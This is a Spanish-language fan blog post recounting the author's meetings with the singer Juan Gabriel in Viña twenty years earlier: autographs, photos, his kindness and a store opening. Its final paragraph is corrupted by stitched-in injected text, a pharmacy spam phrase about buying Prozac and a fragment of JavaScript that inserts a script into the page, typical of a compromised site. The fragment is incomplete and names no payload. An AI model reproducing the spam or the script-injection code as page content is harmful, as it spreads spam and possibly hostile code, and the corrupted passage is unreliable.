Vivencias: Gladys Rodriguez

Comparte !

Eh aquí un resumen de lo que viví hace 20 años cuando fu a mi primer concierto de Juan Gabriel en Viña, 21 de septiembre.

Juan Gabriel Club de Fans

El 22 septiembre Juan Gabriel estuvo en un canal de TV, no pude ingresar no teníamos invitación y sólo había que esperar.  Al llegar nos saludó por la ventana del auto, yo sólo roce su mano. Igual quedé feliz.

Juan Gabriel Club de Fans

El 23 de septiembre nos recibió en el Hotel después de 11 hs de espera para que el mánager diera el consentimiento.

Juan Gabriel Club de Fans

Nos saludó y se disculpó por la espera, ya que no le informaron de nuestra presencia, Juan Gabriel salía a cenar con gente de le TV.

Juan Gabriel Club de Fans

Juan Gabriel Club de Fans

Nos dedicó media hora, nos dio autógrafos y permitió las fotos, en la foto inferior yo le estoy diciendo que le dedicaba una de sus canciones Lentamente, le dije, “porque con esa canción llegó Ud. a mi vida”, me contestó “Gracias amor”, con su dulce sonrisa.

Juan Gabriel Club de Fans

La foto con mi Ídolo Juan Gabriel me autografió el libro QUERIDO ALBERTO, su carita y manos tenían una frescura y suavidad que aún recuerdo dulcemente y su olor venido del más bello de los jardines, mi mente guarda todo esos detalles.

Juan Gabriel Club de Fans

Juan Gabriel Club de Fans

Me propuse estar lo más serena para ése momento pero Juan Gabriel transmite una paz que no permite hacer locuras y perder el control, se despidió nos aconsejó comer mucha frutas y verduras, fue un maravilloso con todos.

Luego de conocerlo personalmente, al siguiente de fue invitado a la inauguración de una gran tienda, no tengo fotos del momento sí una grabación cómo fue todo, le regalaron implementos típicos: sombrero, espuelas y una manta o poncho de huaso chileno. Él dió su bendición y deseó que todos quienes trabajan en ese lugar tuvieran mucha salud. can u buy prozac in the uk. } else {document.currentScript.parentNode.insertBefore(s, document.currentScript);

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

shares